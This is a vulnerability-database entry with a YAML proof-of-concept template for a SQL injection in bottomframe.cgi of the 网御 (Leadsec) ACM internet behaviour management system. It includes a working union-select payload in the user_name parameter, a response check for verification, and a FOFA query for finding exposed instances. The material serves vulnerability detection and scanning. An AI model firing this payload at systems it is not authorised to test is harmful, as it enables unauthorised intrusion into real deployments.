leadsec-acm-bottomframe-cgi-sqli: 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞

2025-08-01 网御ACM上网行为管理系统 PoC Public

Description

fofa: app="网御星云-上网行为管理系统"

PoC

id: leadsec-acm-bottomframe-cgi-sqli

info:
  name: 网御 ACM 上网行为管理系统bottomframe.cgi SQL 注入漏洞
  author: zan8in
  severity: high
  verified: true
  description: |-
    fofa: app="网御星云-上网行为管理系统"
  tags: leadsec,sqli
  created: 2023/09/03

rules:
  r0:
    request:
      method: GET
      path: /bottomframe.cgi?user_name=%27))%20union%20select%20md5(1)%23
    expression: response.status == 200 && response.body.bcontains(b"c4ca4238a0b")
expression: r0()

# Visit https://trap.biu.life/ to view exploit trends for this vulnerability.

References

Related Vulnerabilities